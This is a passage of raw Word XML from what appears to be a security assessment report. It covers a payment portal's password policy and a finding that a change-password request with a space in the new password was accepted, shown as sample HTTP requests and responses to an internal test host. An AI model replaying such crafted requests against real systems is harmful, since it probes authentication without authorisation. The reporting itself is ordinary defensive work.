                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007019FF">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Password cannot contain 3 or more consecutive characters of the Username.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="516F7817" w14:textId="77777777" w:rsidR="00914B7E" w:rsidRPr="007019FF" w:rsidRDefault="00914B7E" w:rsidP="00914B7E">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="13"/>
              </w:numPr>
              <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007019FF">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Password cannot consecutively repeat a character or number more than twice.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C5EE94A" w14:textId="77777777" w:rsidR="00914B7E" w:rsidRPr="007019FF" w:rsidRDefault="00914B7E" w:rsidP="00914B7E">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="13"/>
              </w:numPr>
              <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007019FF">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Password cannot contain spaces.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20289B0B" w14:textId="77777777" w:rsidR="00914B7E" w:rsidRPr="007019FF" w:rsidRDefault="00914B7E" w:rsidP="00914B7E">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="13"/>
              </w:numPr>
              <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007019FF">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Password cannot contain invalid characters.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50D0C2B2" w14:textId="77777777" w:rsidR="00F03F96" w:rsidRPr="00397EF0" w:rsidRDefault="00914B7E" w:rsidP="00914B7E">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007019FF">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Passwords must be masked when entered on the screen.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="41FFDB81" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2005" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DAEEF3" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="2995EE9D"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lastRenderedPageBreak/>
              <w:t>Retest Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7589" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DAEEF3" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="77EFB501" w14:textId="77777777" w:rsidR="00F03F96" w:rsidRPr="00397EF0" w:rsidRDefault="00F03F96" w:rsidP="00F03F96">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="36E03A25" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9594" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F94AC52" w14:textId="77777777" w:rsidR="00914B7E" w:rsidRDefault="00914B7E" w:rsidP="00F03F96">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">The below HTTP requests and responses were modified to break the current password policies. In this case, the password included a space, and the application continued to process as a valid password for the account. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55A39211" w14:textId="77777777" w:rsidR="00914B7E" w:rsidRPr="007F691B" w:rsidRDefault="00914B7E" w:rsidP="00F03F96">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007F691B">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>HTTP Request 1:</w:t>
            </w:r>
          </w:p>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="TableGrid"/>
              <w:tblW w:w="0" w:type="auto"/>
              <w:tblLayout w:type="fixed"/>
              <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="9354"/>
            </w:tblGrid>
            <w:tr w:rsidR="00914B7E" w:rsidRPr="00914B7E" w14:paraId="464A0A32" w14:textId="77777777" w:rsidTr="00914B7E">
              <w:trPr>
                <w:trHeight w:val="2343"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="9354" w:type="dxa"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF" w:themeFill="background1" w:themeFillShade="BF"/>
                </w:tcPr>
                <w:p w14:paraId="7F276C91" w14:textId="77777777" w:rsidR="00914B7E" w:rsidRPr="00914B7E" w:rsidRDefault="00914B7E" w:rsidP="00914B7E">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00914B7E">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>POST /</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00914B7E">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>paymentgateway</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00914B7E">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>/</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00914B7E">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>gofundhip</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00914B7E">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>/secure/v1/</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00914B7E">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>gbd</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00914B7E">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>/account/</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00914B7E">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>changePassword</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00914B7E">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> HTTP/1.1</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="267CE113" w14:textId="77777777" w:rsidR="00914B7E" w:rsidRPr="00914B7E" w:rsidRDefault="00914B7E" w:rsidP="00914B7E">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00914B7E">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Host: payment.sit2.va.anthem.com</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="1FD36D0C" w14:textId="77777777" w:rsidR="00914B7E" w:rsidRPr="00914B7E" w:rsidRDefault="00914B7E" w:rsidP="00914B7E">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00914B7E">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="red"/>
                    </w:rPr>
                    <w:t>[SNIP]</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="0D0B225B" w14:textId="77777777" w:rsidR="00914B7E" w:rsidRPr="00914B7E" w:rsidRDefault="00914B7E" w:rsidP="00914B7E">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00914B7E">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Referer</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00914B7E">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>: https://payment.sit2.va.anthem.com/</w:t>
                  </w:r>
                  <w:r w:rsidRPr="007F691B">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>sgofundhip/secure/changePassword</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="7F31AAFC" w14:textId="77777777" w:rsidR="00914B7E" w:rsidRPr="00914B7E" w:rsidRDefault="00914B7E" w:rsidP="00914B7E">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00914B7E">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="red"/>
                    </w:rPr>
                    <w:t>[SNIP]</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="2F799303" w14:textId="77777777" w:rsidR="00914B7E" w:rsidRPr="00914B7E" w:rsidRDefault="00914B7E" w:rsidP="00914B7E">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00914B7E">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Cache-Control: no-cache</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="6609B187" w14:textId="77777777" w:rsidR="00914B7E" w:rsidRPr="00914B7E" w:rsidRDefault="00914B7E" w:rsidP="00914B7E">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00914B7E">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>{</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="1CEC8746" w14:textId="77777777" w:rsidR="00914B7E" w:rsidRPr="00914B7E" w:rsidRDefault="00914B7E" w:rsidP="00914B7E">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00914B7E">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve">  "</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00914B7E">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>currentPassword</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00914B7E">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>": "password1",</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="390E4C3E" w14:textId="77777777" w:rsidR="00914B7E" w:rsidRPr="00914B7E" w:rsidRDefault="00914B7E" w:rsidP="00914B7E">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00914B7E">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve">  </w:t>
                  </w:r>
                  <w:r w:rsidRPr="007F691B">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>"</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="007F691B">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>newPassword</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="007F691B">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>": "password 1992"</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="748FA8C2" w14:textId="77777777" w:rsidR="00914B7E" w:rsidRPr="00914B7E" w:rsidRDefault="00914B7E" w:rsidP="00914B7E">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00914B7E">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>}</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="2175F369" w14:textId="77777777" w:rsidR="00914B7E" w:rsidRPr="007F691B" w:rsidRDefault="00914B7E" w:rsidP="00F03F96">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007F691B">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>HTTP Response 2:</w:t>
            </w:r>
          </w:p>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="TableGrid"/>
              <w:tblW w:w="0" w:type="auto"/>
              <w:tblLayout w:type="fixed"/>
              <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="9354"/>
            </w:tblGrid>
            <w:tr w:rsidR="007F691B" w:rsidRPr="007F691B" w14:paraId="5CE64CFF" w14:textId="77777777" w:rsidTr="007F691B">
              <w:trPr>
                <w:trHeight w:val="1487"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="9354" w:type="dxa"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF" w:themeFill="background1" w:themeFillShade="BF"/>
                </w:tcPr>
                <w:p w14:paraId="4507D56A"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highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>HTTP/1.1 200 OK</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="58932E48"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rPr>
                    <w:t>Date: Fri, 31 May 2019 17:41:56 GMT</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="216353C7"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highlight w:val="red"/>
                    </w:rPr>
                    <w:t>[SNIP]</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="7A91C80A"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rPr>
                    <w:t>Connection: close</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="45B4242A"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rPr>
                    <w:t>Content-Length: 21</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="2ADC34E7"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highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>{"</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="007F691B">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>changeStatus</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="007F691B">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>":true}</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="0A24ACA1" w14:textId="77777777" w:rsidR="00914B7E" w:rsidRPr="007F691B" w:rsidRDefault="00914B7E" w:rsidP="00914B7E">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007F691B">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>HTTP Request 1:</w:t>
            </w:r>
          </w:p>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="TableGrid"/>
              <w:tblW w:w="0" w:type="auto"/>
              <w:tblLayout w:type="fixed"/>
              <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="9354"/>
            </w:tblGrid>
            <w:tr w:rsidR="007F691B" w:rsidRPr="007F691B" w14:paraId="2DFD28FD" w14:textId="77777777" w:rsidTr="007F691B">
              <w:trPr>
                <w:trHeight w:val="2129"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="9354" w:type="dxa"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF" w:themeFill="background1" w:themeFillShade="BF"/>
                </w:tcPr>
                <w:p w14:paraId="3BFF55BC"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rPr>
                    <w:t>POST /</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="007F691B">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>paymentgateway</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="007F691B">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>/</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="007F691B">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>loginservices</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="007F691B">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>/v1/</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="007F691B">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>gbd</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="007F691B">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>/account/</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="007F691B">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>changePassword</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="007F691B">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> HTTP</w:t>
                  </w:r>
                  <w:r w:rsidRPr="007F691B">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>/1.1</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="4D88DE72"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rPr>
                    <w:t>Host: payment.sit2.va.anthem.com</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="16CA8A64"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highlight w:val="red"/>
                    </w:rPr>
